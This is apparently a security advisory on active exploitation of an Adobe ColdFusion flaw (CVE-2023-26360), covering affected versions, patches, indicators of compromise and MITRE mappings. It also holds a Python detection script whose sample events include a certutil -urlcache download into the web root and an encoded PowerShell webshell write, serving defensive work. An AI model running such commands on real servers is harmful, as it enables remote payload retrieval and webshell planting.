Update – Adobe ColdFusion vulnerability exploited (21st March 2023 at 15:13 UTC)
Active exploitation of Adobe ColdFusion vulnerabilities has been detected by cyber security researchers at Rapid7. At the time of writing, the reported instances have not been attributed to the recently reported Adobe ColdFusion vulnerability, tracked as CVE-2023-26360. However, a potential association has not been explicitly ruled out as of yet.
The timeline of the reported exploitation dates back to January 2023. Investigations indicate that a threat actor deployed webshells using an encoded PowerShell command that redirected strings into files in order to create the webshells.
The investigation also observed use of the ‘certutil.exe’ binary with the ‘-urlcache’ flag, a technique threat actors apply to retrieve files hosted on a remote web server.
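The two techniques described above (encoded PowerShell writing a file into the web root, and certutil with -urlcache) can be flagged from process-creation telemetry. The following is an added Python example, not code from the original advisory or from Rapid7; the event lines, the webshell file name and the ColdFusion install path are constructed for illustration, and the default wwwroot layout is an assumption.

```python
import base64
import re

def _enc(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed sample process-creation events: parent|image|command line (not real telemetry).
SAMPLE_EVENTS = [
    "coldfusion.exe|cmd.exe|cmd.exe /c certutil.exe -urlcache -split -f http://example.invalid/zzz.txt "
    "C:\\ColdFusion2021\\cfusion\\wwwroot\\zzz.txt",
    "coldfusion.exe|powershell.exe|powershell.exe -nop -w hidden -enc "
    + _enc("echo placeholder > C:\\ColdFusion2021\\cfusion\\wwwroot\\wow1.cfm"),
    "explorer.exe|certutil.exe|certutil.exe -hashfile C:\\Users\\a\\setup.msi SHA256",
    "svchost.exe|powershell.exe|powershell.exe -Command Get-Process",
]

CF_WEBROOT = re.compile(r"coldfusion[^|]*?wwwroot", re.I)   # assumed default install layout
SCRIPT_EXT = re.compile(r"\.(cfm|cfc|txt)\b", re.I)          # extensions seen in the reported webshells
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
FILE_WRITE = re.compile(r">|set-content|out-file|add-content", re.I)

def decode_encoded_powershell(cmdline: str):
    """Return the decoded script for -enc/-EncodedCommand invocations, or None if absent/invalid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify_event(event: str) -> list:
    """Return the detection labels that apply to one parent|image|cmdline event."""
    parent, image, cmdline = event.split("|", 2)
    findings, low = [], cmdline.lower()
    if "certutil" in low and "-urlcache" in low:            # remote file retrieval via certutil
        findings.append("certutil_urlcache_download")
    decoded = decode_encoded_powershell(cmdline) if "powershell" in image.lower() else None
    if decoded is not None:
        findings.append("encoded_powershell")
        if FILE_WRITE.search(decoded) and SCRIPT_EXT.search(decoded):
            findings.append("encoded_powershell_writes_script_file")
        if CF_WEBROOT.search(decoded):                      # content landing in the served web root
            findings.append("write_into_coldfusion_webroot")
    if "coldfusion" in parent.lower() and image.lower() in ("cmd.exe", "powershell.exe", "certutil.exe"):
        findings.append("coldfusion_spawned_shell")        # web server process spawning a shell
    return findings

def scan(events) -> dict:
    """Map event index -> findings for every event that triggered at least one label."""
    return {i: f for i, f in ((i, classify_event(e)) for i, e in enumerate(events)) if f}
```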
Updated Indicators of Compromise
– www.av-iq[.]com – FQDN
– www.ooshirts[.]com – FQDN
– hXXps://www.av-iq[.]com/wow.txt – URL
– hXXps://www.ooshirts[.]com/images/zzz.txt – URL
– hXXps://www.ooshirts[.]com/images/dncat.exe – URL
– hXXp://www.ooshirts[.]com/images/nc.exe – URL
– WOW.TXT – ColdFusion WebShell
– wow.txt – ColdFusion WebShell
– www.txt – ColdFusion WebShell
– www.cfm – ColdFusion WebShell
– wow1.cfm – ColdFusion WebShell
– zzz.txt – ColdFusion WebShell
– dncat.exe – DotNetCat
– nc.exe – NetCat
Updated Mitre Methodologies
– TA0042 – Resource Development
Indiscriminate, opportunistic targeting.
Severity Level – Critical: Compromise may result in the loss of confidentiality and integrity of data.
A critical arbitrary code execution security flaw has been disclosed as affecting Adobe ColdFusion. The vulnerability, tracked as CVE-2023-26360 (CVSSv3 score: 8.6), is caused by an Improper Access Control weakness and has the potential to be exploited by remote unauthenticated threat actors in low-complexity attacks. Adobe reported that the vulnerability is currently being exploited in the wild “in very limited attacks”.
The Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its catalogue of security flaws exploited in the wild and has given Federal Civilian Executive Branch (FCEB) agencies until 5th April 2023 to apply the relevant updates to safeguard their networks against potential threats.
Successful exploitation of CVE-2023-26360 could enable threat actors to gain arbitrary code execution and arbitrary file system read capabilities, in relation to the affected Adobe product versions.
Adobe has released patches for the affected product versions. The following versions, and all earlier releases, remain vulnerable until updated:
– Adobe ColdFusion 2018: Update 15 and earlier
– Adobe ColdFusion 2021: Update 5 and earlier
It should be noted that CVE-2023-26360 also affects Adobe ColdFusion 2016 and ColdFusion 11 installations, neither of which are supported as they have reached end-of-life (EoL).
Containment, Mitigations & Remediations
It is strongly recommended that administrators apply the following Adobe updates:
– Adobe ColdFusion 2018: Update 16
– Adobe ColdFusion 2021: Update 6
Indicators of Compromise
No specific Indicators of Compromise (IoCs) are available at this time.
Adobe occupies a significant portion of the application-development market share. Threat actors generally weigh the probability of success against asset value when deciding which attack surfaces to focus on, so application-development products can emerge as a prime target. Because Adobe products have become an integral part of personal and business operations, threat actors will continue to exploit the associated vulnerabilities in an attempt to exfiltrate the sensitive data they hold or to impact the associated business operations.
No attribution to specific threat actors or groups has been identified at the time of writing.
– TA0004 – Privilege Escalation
– T1055.001 – Process Injection: Dynamic-link Library Injection
Common Weakness Enumeration:
– CWE-284 – Improper Access Control